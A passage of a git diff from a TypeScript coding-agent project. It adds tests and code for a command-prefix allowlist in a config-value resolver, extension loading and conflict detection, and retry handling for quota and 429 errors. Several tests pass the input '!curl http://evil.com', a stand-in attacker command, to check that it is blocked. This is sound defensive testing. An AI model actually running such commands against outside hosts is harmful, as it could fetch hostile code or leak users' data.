http://evil.com"); - resolveConfigValue("!curl http://evil.com"); - // The block warning should only fire once; the second call hits the cache - // before reaching the allowlist check, so stderr count is 1. - assert.equal(callCount.n, 1); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + resolveConfigValue("!curl http://evil.com"); + resolveConfigValue("!curl http://evil.com"); + // The block warning should only fire once; the second call hits the cache + // before reaching the allowlist check, so stderr count is 1. + assert.equal(callCount.n, 1); }); - it("clearConfigValueCache resets cached entries", () => { + it("clearConfigValueCache resets cached entries", (t) => { const stderrChunks: string[] = []; const originalWrite = process.stderr.write.bind(process.stderr); process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { stderrChunks.push(chunk.toString()); return true; }; - - try { - resolveConfigValue("!curl http://evil.com"); - assert.equal(stderrChunks.length, 1); - - clearConfigValueCache(); - - resolveConfigValue("!curl http://evil.com"); - assert.equal(stderrChunks.length, 2); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + resolveConfigValue("!curl http://evil.com"); + assert.equal(stderrChunks.length, 1); + + clearConfigValueCache(); + + resolveConfigValue("!curl http://evil.com"); + assert.equal(stderrChunks.length, 2); + }); +}); + +describe("REGRESSION #666: non-default credential tool blocked with no override", () => { + afterEach(() => { + setAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES); + clearConfigValueCache(); + }); + + it("sops is blocked by default, then unblocked by setAllowedCommandPrefixes", (t) => { + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + t.after(() 
=> { + process.stderr.write = originalWrite; + }); + + // Bug: sops is not in SAFE_COMMAND_PREFIXES, so it's blocked + const result = resolveConfigValue("!sops decrypt --output-type json secrets.enc.json"); + assert.equal(result, undefined, "sops is blocked by the hardcoded allowlist"); + assert.ok( + stderrChunks.some((line) => line.includes('Blocked disallowed command: "sops"')), + "should log a block message for sops", + ); + + stderrChunks.length = 0; + clearConfigValueCache(); + + // Fix: override the allowlist to include sops + setAllowedCommandPrefixes([...SAFE_COMMAND_PREFIXES, "sops"]); + resolveConfigValue("!sops decrypt --output-type json secrets.enc.json"); + + const blockedAfterOverride = stderrChunks.some((line) => + line.includes("Blocked disallowed command"), + ); + assert.equal(blockedAfterOverride, false, "sops must not be blocked after override"); + }); +}); + +describe("setAllowedCommandPrefixes — user override", () => { + afterEach(() => { + setAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES); + clearConfigValueCache(); + }); + + it("overrides built-in prefixes with custom list", () => { + setAllowedCommandPrefixes(["sops", "doppler"]); + assert.deepEqual([...getAllowedCommandPrefixes()], ["sops", "doppler"]); + }); + + it("custom prefix is allowed through to execution", (t) => { + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + t.after(() => { + process.stderr.write = originalWrite; + }); + + setAllowedCommandPrefixes(["mycli"]); + resolveConfigValue("!mycli get-secret"); + const blocked = stderrChunks.some((line) => line.includes("Blocked disallowed command")); + assert.equal(blocked, false, "mycli should not be blocked when in the custom allowlist"); + }); + + it("previously-allowed prefix is blocked after override", (t) => { + const stderrChunks: 
string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + t.after(() => { + process.stderr.write = originalWrite; + }); + + setAllowedCommandPrefixes(["sops"]); + const result = resolveConfigValue("!pass show secret"); + assert.equal(result, undefined); + const blocked = stderrChunks.some((line) => line.includes("Blocked disallowed command")); + assert.equal(blocked, true, "pass should be blocked when not in the custom allowlist"); + }); + + it("clears cache when overriding prefixes", (t) => { + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + t.after(() => { + process.stderr.write = originalWrite; + }); + + resolveConfigValue("!mycli get-secret"); + assert.ok(stderrChunks.some((line) => line.includes("Blocked"))); + + stderrChunks.length = 0; + + setAllowedCommandPrefixes(["mycli"]); + resolveConfigValue("!mycli get-secret"); + const blocked = stderrChunks.some((line) => line.includes("Blocked")); + assert.equal(blocked, false, "Should re-evaluate after allowlist change"); }); }); diff --git a/packages/pi-coding-agent/src/core/resolve-config-value.ts b/packages/pi-coding-agent/src/core/resolve-config-value.ts index e12c4c2ae..9b72ca65f 100644 --- a/packages/pi-coding-agent/src/core/resolve-config-value.ts +++ b/packages/pi-coding-agent/src/core/resolve-config-value.ts @@ -24,6 +24,30 @@ export const SAFE_COMMAND_PREFIXES = [ "lpass", ]; +/** + * Active command prefix allowlist. Defaults to SAFE_COMMAND_PREFIXES but can be + * overridden via setAllowedCommandPrefixes() (called from settings or env var). 
+ */ +let activeCommandPrefixes: string[] = SAFE_COMMAND_PREFIXES; + +/** + * Replace the active command prefix allowlist. + * Called during initialization when the user has configured `allowedCommandPrefixes` + * in global settings.json or via the GSD_ALLOWED_COMMAND_PREFIXES env var. + */ +export function setAllowedCommandPrefixes(prefixes: string[]): void { + if (prefixes.length === 0) { + process.stderr.write("[resolve-config-value] Warning: empty command prefix allowlist — all !commands will be blocked\n"); + } + activeCommandPrefixes = prefixes; + clearConfigValueCache(); +} + +/** Get the currently active command prefix allowlist. */ +export function getAllowedCommandPrefixes(): readonly string[] { + return activeCommandPrefixes; +} + /** * Resolve a config value (API key, header value, etc.) to an actual value. * - If starts with "!", executes the rest as a shell command and uses stdout (cached) @@ -45,8 +69,8 @@ function executeCommand(commandConfig: string): string | undefined { const command = commandConfig.slice(1); const tokens = command.split(/\s+/).filter(Boolean); const firstToken = tokens[0]; - if (!SAFE_COMMAND_PREFIXES.includes(firstToken)) { - process.stderr.write(`[resolve-config-value] Blocked disallowed command: "${firstToken}". Allowed: ${SAFE_COMMAND_PREFIXES.join(", ")}\n`); + if (!activeCommandPrefixes.includes(firstToken)) { + process.stderr.write(`[resolve-config-value] Blocked disallowed command: "${firstToken}". 
Allowed: ${activeCommandPrefixes.join(", ")}\n`); commandResultCache.set(commandConfig, undefined); return undefined; } diff --git a/packages/pi-coding-agent/src/core/resource-loader-cache-reset.test.ts b/packages/pi-coding-agent/src/core/resource-loader-cache-reset.test.ts new file mode 100644 index 000000000..f59c557a7 --- /dev/null +++ b/packages/pi-coding-agent/src/core/resource-loader-cache-reset.test.ts @@ -0,0 +1,42 @@ +// GSD-2 — Regression test for #3616: reload() must reset jiti extension loader cache +// Copyright (c) 2026 Jeremy McSpadden + +import test, { describe } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join } from "node:path"; + +const source = readFileSync( + join(process.cwd(), "packages/pi-coding-agent/src/core/resource-loader.ts"), + "utf-8", +); + +describe("#3616 — reload() must invalidate jiti module cache", () => { + test("resource-loader imports resetExtensionLoaderCache from loader.js", () => { + assert.ok( + source.includes("resetExtensionLoaderCache"), + "resource-loader.ts should import resetExtensionLoaderCache", + ); + assert.ok( + source.includes('from "./extensions/loader.js"'), + "resetExtensionLoaderCache should be imported from extensions/loader.js", + ); + }); + + test("reload() calls resetExtensionLoaderCache before loadExtensions", () => { + const reloadStart = source.indexOf("async reload(): Promise"); + assert.ok(reloadStart >= 0, "should find reload() method"); + const reloadBody = source.slice(reloadStart, reloadStart + 4000); + + const resetIdx = reloadBody.indexOf("resetExtensionLoaderCache()"); + assert.ok(resetIdx >= 0, "reload() should call resetExtensionLoaderCache()"); + + const loadIdx = reloadBody.indexOf("loadExtensions("); + assert.ok(loadIdx >= 0, "reload() should call loadExtensions"); + + assert.ok( + resetIdx < loadIdx, + "resetExtensionLoaderCache() must be called BEFORE loadExtensions to ensure fresh modules", + ); + }); +}); diff --git 
a/packages/pi-coding-agent/src/core/resource-loader.ts b/packages/pi-coding-agent/src/core/resource-loader.ts index c8c1c048c..34ab7565e 100644 --- a/packages/pi-coding-agent/src/core/resource-loader.ts +++ b/packages/pi-coding-agent/src/core/resource-loader.ts @@ -1,6 +1,6 @@ import { existsSync, readdirSync, readFileSync, statSync } from "node:fs"; import { homedir } from "node:os"; -import { join, resolve, sep } from "node:path"; +import { basename, dirname, join, relative, resolve, sep } from "node:path"; import chalk from "chalk"; import { CONFIG_DIR_NAME, getAgentDir } from "../config.js"; import { loadThemeFromPath, type Theme } from "../modes/interactive/theme/theme.js"; @@ -9,7 +9,7 @@ import type { ResourceCollision, ResourceDiagnostic } from "./diagnostics.js"; export type { ResourceCollision, ResourceDiagnostic } from "./diagnostics.js"; import { createEventBus, type EventBus } from "./event-bus.js"; -import { createExtensionRuntime, loadExtensionFromFactory, loadExtensions } from "./extensions/loader.js"; +import { createExtensionRuntime, loadExtensionFromFactory, loadExtensions, resetExtensionLoaderCache } from "./extensions/loader.js"; import type { Extension, ExtensionFactory, ExtensionRuntime, LoadExtensionsResult } from "./extensions/types.js"; import { DefaultPackageManager, type PathMetadata } from "./package-manager.js"; import type { PromptTemplate } from "./prompt-templates.js"; @@ -121,12 +121,21 @@ export interface DefaultResourceLoaderOptions { additionalPromptTemplatePaths?: string[]; additionalThemePaths?: string[]; extensionFactories?: ExtensionFactory[]; + bundledExtensionKeys?: Set; noExtensions?: boolean; noSkills?: boolean; noPromptTemplates?: boolean; noThemes?: boolean; systemPrompt?: string; appendSystemPrompt?: string; + /** Names of bundled extensions (used to identify built-in extensions in conflict detection). */ + bundledExtensionNames?: Set; + /** + * Transform extension paths before loading. 
Receives the merged list of all + * discovered extension paths and returns a (possibly reordered/filtered) list. + * Use this to apply dependency sorting or registry-based filtering. + */ + extensionPathsTransform?: (paths: string[]) => { paths: string[]; diagnostics?: string[] }; extensionsOverride?: (base: LoadExtensionsResult) => LoadExtensionsResult; skillsOverride?: (base: { skills: Skill[]; diagnostics: ResourceDiagnostic[] }) => { skills: Skill[]; @@ -153,6 +162,7 @@ export class DefaultResourceLoader implements ResourceLoader { private settingsManager: SettingsManager; private eventBus: EventBus; private packageManager: DefaultPackageManager; + private bundledExtensionKeys: Set; private additionalExtensionPaths: string[]; private additionalSkillPaths: string[]; private additionalPromptTemplatePaths: string[]; @@ -164,6 +174,8 @@ export class DefaultResourceLoader implements ResourceLoader { private noThemes: boolean; private systemPromptSource?: string; private appendSystemPromptSource?: string; + private bundledExtensionNames: Set; + private extensionPathsTransform?: (paths: string[]) => { paths: string[]; diagnostics?: string[] }; private extensionsOverride?: (base: LoadExtensionsResult) => LoadExtensionsResult; private skillsOverride?: (base: { skills: Skill[]; diagnostics: ResourceDiagnostic[] }) => { skills: Skill[]; @@ -208,6 +220,7 @@ export class DefaultResourceLoader implements ResourceLoader { agentDir: this.agentDir, settingsManager: this.settingsManager, }); + this.bundledExtensionKeys = options.bundledExtensionKeys ?? new Set(); this.additionalExtensionPaths = options.additionalExtensionPaths ?? []; this.additionalSkillPaths = options.additionalSkillPaths ?? []; this.additionalPromptTemplatePaths = options.additionalPromptTemplatePaths ?? []; @@ -219,6 +232,8 @@ export class DefaultResourceLoader implements ResourceLoader { this.noThemes = options.noThemes ?? 
false; this.systemPromptSource = options.systemPrompt; this.appendSystemPromptSource = options.appendSystemPrompt; + this.bundledExtensionNames = options.bundledExtensionNames ?? new Set(); + this.extensionPathsTransform = options.extensionPathsTransform; this.extensionsOverride = options.extensionsOverride; this.skillsOverride = options.skillsOverride; this.promptsOverride = options.promptsOverride; @@ -305,6 +320,10 @@ export class DefaultResourceLoader implements ResourceLoader { } async reload(): Promise { + // Invalidate the shared jiti module cache so updated extension code + // on disk is re-compiled instead of served from the stale cache (#3616). + resetExtensionLoaderCache(); + const resolvedPaths = await this.packageManager.resolve(); const cliExtensionPaths = await this.packageManager.resolveExtensionSources(this.additionalExtensionPaths, { temporary: true, @@ -374,10 +393,21 @@ export class DefaultResourceLoader implements ResourceLoader { const cliEnabledPrompts = getEnabledPaths(cliExtensionPaths.prompts); const cliEnabledThemes = getEnabledPaths(cliExtensionPaths.themes); - const extensionPaths = this.noExtensions + let extensionPaths = this.noExtensions ? 
cliEnabledExtensions : this.mergePaths(cliEnabledExtensions, enabledExtensions); + // Apply path transform (dependency sorting, registry filtering) if provided + if (this.extensionPathsTransform) { + const transformed = this.extensionPathsTransform(extensionPaths); + extensionPaths = transformed.paths; + if (transformed.diagnostics?.length) { + for (const msg of transformed.diagnostics) { + process.stderr.write(`[extensions] ${msg}\n`); + } + } + } + const extensionsResult = await loadExtensions(extensionPaths, this.cwd, this.eventBus); const inlineExtensions = await this.loadExtensionFactories(extensionsResult.runtime); extensionsResult.extensions.push(...inlineExtensions.extensions); @@ -790,66 +820,110 @@ export class DefaultResourceLoader implements ResourceLoader { return target.startsWith(prefix); } + /** + * Extract the extension name from its path. + * For root-level files: basename without extension (e.g. "search-the-web.ts" → "search-the-web") + * For subdirectory extensions: the directory name (e.g. "/path/to/gsd/index.ts" → "gsd") + */ + private getExtensionNameFromPath(extPath: string): string { + const base = basename(extPath); + if (base === "index.js" || base === "index.ts") { + return basename(dirname(extPath)); + } + return base.replace(/\.(?:ts|js)$/, ""); + } + private detectExtensionConflicts(extensions: Extension[]): Array<{ path: string; message: string }> { - const conflicts: Array<{ path: string; message: string }> = []; + return detectExtensionConflicts(extensions, this.bundledExtensionKeys, join(this.agentDir, "extensions")); + } +} - // Track which extension registered each tool, command, and flag - const toolOwners = new Map(); - const commandOwners = new Map(); - const flagOwners = new Map(); +/** + * Extract the extension directory name (key) from a full extension path. + * Given extensionsDir `/home/user/.gsd/agent/extensions` and + * ownerPath `/home/user/.gsd/agent/extensions/mcp-client/index.js`, + * returns `"mcp-client"`. 
Returns `undefined` when the path is not + * under extensionsDir. + */ +export function extractExtensionKey(ownerPath: string, extensionsDir: string): string | undefined { + const normalizedDir = resolve(extensionsDir); + const normalizedPath = resolve(ownerPath); + const prefix = normalizedDir.endsWith(sep) ? normalizedDir : `${normalizedDir}${sep}`; + if (!normalizedPath.startsWith(prefix)) { + return undefined; + } + const relPath = relative(normalizedDir, normalizedPath); + const firstSegment = relPath.split(/[\\/]/)[0]; + return firstSegment?.replace(/\.(?:ts|js)$/, "") || undefined; +} - for (const ext of extensions) { - // Check tools - for (const toolName of ext.tools.keys()) { - const existingOwner = toolOwners.get(toolName); - if (existingOwner && existingOwner !== ext.path) { - // Determine if the existing owner is a built-in (not a user extension) - const isBuiltIn = !existingOwner.includes("/.gsd/agent/extensions/") && - !existingOwner.includes("/.gsd/extensions/"); - const hint = isBuiltIn - ? ` (built-in tool supersedes — consider removing ${ext.path})` - : ""; - conflicts.push({ - path: ext.path, - message: `Tool "${toolName}" conflicts with ${existingOwner}${hint}`, - }); - } else { - toolOwners.set(toolName, ext.path); - } - } +/** + * Detect tool/command/flag name collisions across loaded extensions. + * + * When the first-registered owner of a name is a bundled extension + * (its key appears in `bundledExtensionKeys`), the conflict message + * includes a "supersedes" hint so downstream display can downgrade the + * severity from "Extension load error" to "Extension conflict". 
+ */ +export function detectExtensionConflicts( + extensions: Extension[], + bundledExtensionKeys: Set, + extensionsDir: string, +): Array<{ path: string; message: string }> { + const conflicts: Array<{ path: string; message: string }> = []; - // Check commands - for (const commandName of ext.commands.keys()) { - const existingOwner = commandOwners.get(commandName); - if (existingOwner && existingOwner !== ext.path) { - const isBuiltIn = !existingOwner.includes("/.gsd/agent/extensions/") && - !existingOwner.includes("/.gsd/extensions/"); - const hint = isBuiltIn - ? ` (built-in command supersedes — consider removing ${ext.path})` - : ""; - conflicts.push({ - path: ext.path, - message: `Command "/${commandName}" conflicts with ${existingOwner}${hint}`, - }); - } else { - commandOwners.set(commandName, ext.path); - } - } + const toolOwners = new Map(); + const commandOwners = new Map(); + const flagOwners = new Map(); - // Check flags - for (const flagName of ext.flags.keys()) { - const existingOwner = flagOwners.get(flagName); - if (existingOwner && existingOwner !== ext.path) { - conflicts.push({ - path: ext.path, - message: `Flag "--${flagName}" conflicts with ${existingOwner}`, - }); - } else { - flagOwners.set(flagName, ext.path); - } + const isBundled = (ownerPath: string): boolean => { + const key = extractExtensionKey(ownerPath, extensionsDir); + return key !== undefined && bundledExtensionKeys.has(key); + }; + + for (const ext of extensions) { + for (const toolName of ext.tools.keys()) { + const existingOwner = toolOwners.get(toolName); + if (existingOwner && existingOwner !== ext.path) { + const hint = isBundled(existingOwner) + ? 
` (built-in tool supersedes — consider removing ${ext.path})` + : ""; + conflicts.push({ + path: ext.path, + message: `Tool "${toolName}" conflicts with ${existingOwner}${hint}`, + }); + } else { + toolOwners.set(toolName, ext.path); } } - return conflicts; + for (const commandName of ext.commands.keys()) { + const existingOwner = commandOwners.get(commandName); + if (existingOwner && existingOwner !== ext.path) { + const hint = isBundled(existingOwner) + ? ` (built-in command supersedes — consider removing ${ext.path})` + : ""; + conflicts.push({ + path: ext.path, + message: `Command "/${commandName}" conflicts with ${existingOwner}${hint}`, + }); + } else { + commandOwners.set(commandName, ext.path); + } + } + + for (const flagName of ext.flags.keys()) { + const existingOwner = flagOwners.get(flagName); + if (existingOwner && existingOwner !== ext.path) { + conflicts.push({ + path: ext.path, + message: `Flag "--${flagName}" conflicts with ${existingOwner}`, + }); + } else { + flagOwners.set(flagName, ext.path); + } + } } + + return conflicts; } diff --git a/packages/pi-coding-agent/src/core/retry-handler.test.ts b/packages/pi-coding-agent/src/core/retry-handler.test.ts new file mode 100644 index 000000000..5cd324401 --- /dev/null +++ b/packages/pi-coding-agent/src/core/retry-handler.test.ts @@ -0,0 +1,431 @@ +/** + * RetryHandler tests — long-context entitlement 429 error handling (#2803) + * + * Verifies that "Extra usage is required for long context requests" errors + * are classified as quota_exhausted (not rate_limit) and trigger a model + * downgrade from [1m] to base when no cross-provider fallback exists. 
+ */ + +import { describe, it, beforeEach, mock, type Mock } from "node:test"; +import assert from "node:assert/strict"; +import { RetryHandler, type RetryHandlerDeps } from "./retry-handler.js"; +import type { Api, AssistantMessage, Model } from "@gsd/pi-ai"; +import type { FallbackResolver } from "./fallback-resolver.js"; +import type { ModelRegistry } from "./model-registry.js"; +import type { SettingsManager } from "./settings-manager.js"; + +// ─── Helpers ──────────────────────────────────────────────────────────────── + +function createMockModel(provider: string, id: string): Model { + return { + id, + name: id, + api: "anthropic" as Api, + provider, + baseUrl: "https://api.anthropic.com", + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1_000_000, + maxTokens: 16384, + } as Model; +} + +function errorMessage(msg: string): AssistantMessage { + return { + role: "assistant", + content: [], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-opus-4-6[1m]", + usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, + stopReason: "error", + errorMessage: msg, + timestamp: Date.now(), + } as AssistantMessage; +} + +interface MockDeps { + deps: RetryHandlerDeps; + emittedEvents: Array>; + continueFn: Mock<() => Promise>; + onModelChangeFn: Mock<(model: Model) => void>; + markUsageLimitReached: Mock<(...args: any[]) => boolean>; + findFallback: Mock<(...args: any[]) => Promise>; + findModel: Mock<(provider: string, modelId: string) => Model | undefined>; +} + +function createMockDeps(overrides?: { + model?: Model; + retryEnabled?: boolean; + markUsageLimitReachedResult?: boolean; + fallbackResult?: any; + findModelResult?: (provider: string, modelId: string) => Model | undefined; + retrySettings?: { + maxRetries?: number; + baseDelayMs?: number; + maxDelayMs?: number; + }; +}): MockDeps { + 
const model = overrides?.model ?? createMockModel("anthropic", "claude-opus-4-6[1m]"); + const emittedEvents: Array<Record<string, any>> = []; + const continueFn = mock.fn(async () => {}); + const onModelChangeFn = mock.fn((_model: Model) => {}); + const markUsageLimitReached = mock.fn( + () => overrides?.markUsageLimitReachedResult ?? false, + ); + const findFallback = mock.fn(async () => overrides?.fallbackResult ?? null); + const findModel = mock.fn( + overrides?.findModelResult ?? ((_provider: string, _modelId: string) => undefined), + ); + + const messages: Array<{ role: string } & Record<string, unknown>> = []; + + const deps: RetryHandlerDeps = { + agent: { + continue: continueFn, + state: { messages }, + setModel: mock.fn(), + replaceMessages: mock.fn((newMessages: any[]) => { + messages.length = 0; + messages.push(...newMessages); + }), + } as any, + settingsManager: { + getRetryEnabled: () => overrides?.retryEnabled ?? true, + getRetrySettings: () => ({ + enabled: overrides?.retryEnabled ?? true, + maxRetries: overrides?.retrySettings?.maxRetries ?? 5, + baseDelayMs: overrides?.retrySettings?.baseDelayMs ?? 1000, + maxDelayMs: overrides?.retrySettings?.maxDelayMs ?? 
30000, + }), + } as unknown as SettingsManager, + modelRegistry: { + authStorage: { + markUsageLimitReached, + }, + find: findModel, + } as unknown as ModelRegistry, + fallbackResolver: { + findFallback, + } as unknown as FallbackResolver, + getModel: () => model, + getSessionId: () => "test-session", + emit: (event: any) => emittedEvents.push(event), + onModelChange: onModelChangeFn, + }; + + return { deps, emittedEvents, continueFn, onModelChangeFn, markUsageLimitReached, findFallback, findModel }; +} + +// ─── _classifyErrorType (tested via handleRetryableError behavior) ────────── + +describe("RetryHandler — long-context entitlement 429 (#2803)", () => { + + describe("error classification", () => { + it("classifies 'Extra usage is required for long context requests' as quota_exhausted, not rate_limit", async () => { + // When the error is classified as quota_exhausted AND no alternate credentials + // AND no fallback, the handler should emit fallback_chain_exhausted and stop. + // If misclassified as rate_limit, it would enter the backoff loop instead. 
+ const { deps, emittedEvents, findModel } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, // no alternate credentials + fallbackResult: null, // no cross-provider fallback + findModelResult: () => undefined, // no base model either + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage( + '429 {"type":"error","error":{"type":"rate_limit_error","message":"Extra usage is required for long context requests."}}' + ); + + const result = await handler.handleRetryableError(msg); + + // Should NOT retry (would be true if misclassified as rate_limit entering backoff) + assert.equal(result, false); + + // Should emit fallback_chain_exhausted (quota_exhausted path), NOT auto_retry_start (backoff path) + const chainExhausted = emittedEvents.find((e) => e.type === "fallback_chain_exhausted"); + assert.ok(chainExhausted, "Expected fallback_chain_exhausted event for entitlement error"); + + const retryStart = emittedEvents.find((e) => e.type === "auto_retry_start"); + assert.equal(retryStart, undefined, "Should NOT emit auto_retry_start for entitlement error"); + }); + + it("still classifies regular 429 rate limits as rate_limit", async () => { + // A normal "rate limit" 429 should still be classified as rate_limit + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + markUsageLimitReachedResult: false, + fallbackResult: null, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("429 Too Many Requests"); + + const result = await handler.handleRetryableError(msg); + + // Should enter the backoff loop (rate_limit path, not quota_exhausted) + assert.equal(result, true); + + const retryStart = emittedEvents.find((e) => e.type === "auto_retry_start"); + assert.ok(retryStart, "Regular 429 should enter backoff retry"); + }); + }); + + describe("long-context model downgrade", () => { + it("downgrades from [1m] to 
base model when entitlement error and no fallback", async () => { + const baseModel = createMockModel("anthropic", "claude-opus-4-6"); + const { deps, emittedEvents, onModelChangeFn, continueFn } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, + fallbackResult: null, + findModelResult: (provider: string, modelId: string) => { + if (provider === "anthropic" && modelId === "claude-opus-4-6") return baseModel; + return undefined; + }, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, true, "Should retry after downgrade"); + + // Should have called setModel with the base model + const setModelCalls = (deps.agent.setModel as any).mock.calls; + assert.equal(setModelCalls.length, 1); + assert.equal(setModelCalls[0].arguments[0].id, "claude-opus-4-6"); + + // Should have notified about model change + assert.equal(onModelChangeFn.mock.calls.length, 1); + + // Should emit a fallback_provider_switch event indicating downgrade + const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch"); + assert.ok(switchEvent, "Expected fallback_provider_switch event for downgrade"); + assert.ok(switchEvent!.reason.includes("long context downgrade"), `reason should mention downgrade: ${switchEvent!.reason}`); + }); + + it("emits fallback_chain_exhausted when base model is also unavailable", async () => { + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6[1m]"), + markUsageLimitReachedResult: false, + fallbackResult: null, + findModelResult: () => undefined, // base model not found + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + + const result = await handler.handleRetryableError(msg); + + 
assert.equal(result, false); + const chainExhausted = emittedEvents.find((e) => e.type === "fallback_chain_exhausted"); + assert.ok(chainExhausted, "Expected fallback_chain_exhausted when base model unavailable"); + }); + + it("does not attempt downgrade for non-[1m] models", async () => { + // When a regular model (no [1m] suffix) gets a quota_exhausted error + // with no fallback, it should just stop — no downgrade attempt. + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + markUsageLimitReachedResult: false, + fallbackResult: null, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, false); + const chainExhausted = emittedEvents.find((e) => e.type === "fallback_chain_exhausted"); + assert.ok(chainExhausted); + + // No downgrade switch should occur + const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch"); + assert.equal(switchEvent, undefined, "Should not switch for non-[1m] models"); + }); + }); + + describe("retry cancellation", () => { + it("cancels queued immediate continue callbacks when retry is aborted", async () => { + const { deps, emittedEvents, continueFn } = createMockDeps({ + markUsageLimitReachedResult: true, + }); + + const handler = new RetryHandler(deps); + const msg = errorMessage("429 Too Many Requests"); + + const result = await handler.handleRetryableError(msg); + assert.equal(result, true, "retry should be initiated"); + + handler.abortRetry(); + await new Promise((resolve) => setTimeout(resolve, 10)); + + assert.equal(continueFn.mock.calls.length, 0, "cancelled retry must not continue after explicit abort"); + const endEvents = emittedEvents.filter((e) => e.type === "auto_retry_end"); + assert.equal(endEvents.length, 1, "retry cancellation should emit a single auto_retry_end event"); + 
assert.equal(endEvents[0]?.finalError, "Retry cancelled"); + }); + }); + + describe("isRetryableError", () => { + it("considers long-context entitlement error as retryable", () => { + const { deps } = createMockDeps(); + const handler = new RetryHandler(deps); + const msg = errorMessage("Extra usage is required for long context requests."); + assert.equal(handler.isRetryableError(msg), true); + }); + + it("does NOT consider credential cooldown error as retryable (#3429)", () => { + // The credential cooldown message from getApiKey() must not re-enter + // the retry handler. Re-entry creates cascading empty error entries + // in the session file that break resume. + const { deps } = createMockDeps(); + const handler = new RetryHandler(deps); + const msg = errorMessage( + 'All credentials for "anthropic" are in a cooldown window. ' + + 'Please wait a moment and try again, or switch to a different provider.', + ); + assert.equal(handler.isRetryableError(msg), false); + }); + }); + + describe("third-party block claude-code fallback (#3772)", () => { + it("switches to claude-code provider when current provider is anthropic", async () => { + const ccModel = createMockModel("claude-code", "claude-opus-4-6"); + const { deps, emittedEvents, onModelChangeFn } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + findModelResult: (provider: string, modelId: string) => { + if (provider === "claude-code" && modelId === "claude-opus-4-6") return ccModel; + return undefined; + }, + }); + deps.isClaudeCodeReady = () => true; + + const handler = new RetryHandler(deps); + const msg = errorMessage("third-party apps cannot draw from extra usage"); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, true, "should retry via claude-code fallback"); + const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch"); + assert.ok(switchEvent, "Expected fallback_provider_switch event"); + 
assert.ok(switchEvent!.to.startsWith("claude-code/"), "Should switch to claude-code provider"); + }); + + it("switches to claude-code on 'out of extra usage' error (#3772)", async () => { + const ccModel = createMockModel("claude-code", "claude-opus-4-6"); + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("anthropic", "claude-opus-4-6"), + findModelResult: (provider: string, modelId: string) => { + if (provider === "claude-code" && modelId === "claude-opus-4-6") return ccModel; + return undefined; + }, + }); + deps.isClaudeCodeReady = () => true; + + const handler = new RetryHandler(deps); + const msg = errorMessage("You're out of extra usage. Add more at claude.ai/settings/usage and keep going."); + + const result = await handler.handleRetryableError(msg); + + assert.equal(result, true, "should retry via claude-code fallback"); + const switchEvent = emittedEvents.find((e) => e.type === "fallback_provider_switch"); + assert.ok(switchEvent, "Expected fallback_provider_switch event"); + assert.ok(switchEvent!.to.startsWith("claude-code/"), "Should switch to claude-code provider"); + }); + + it("does NOT switch to claude-code when current provider is not anthropic", async () => { + const ccModel = createMockModel("claude-code", "gpt-4o"); + const { deps, emittedEvents } = createMockDeps({ + model: createMockModel("openai", "gpt-4o"), + findModelResult: (provider: string, modelId: string) => { + if (provider === "claude-code" && modelId === "gpt-4o") return ccModel; + return undefined; + }, + }); + deps.isClaudeCodeReady = () => true; + + const handler = new RetryHandler(deps); + const msg = errorMessage("third-party apps are not supported for this plan"); + + const result = await handler.handleRetryableError(msg); + + // Should NOT have triggered the claude-code fallback + const switchEvent = emittedEvents.find( + (e) => e.type === "fallback_provider_switch" && e.to?.startsWith("claude-code/"), + ); + assert.equal(switchEvent, undefined, 
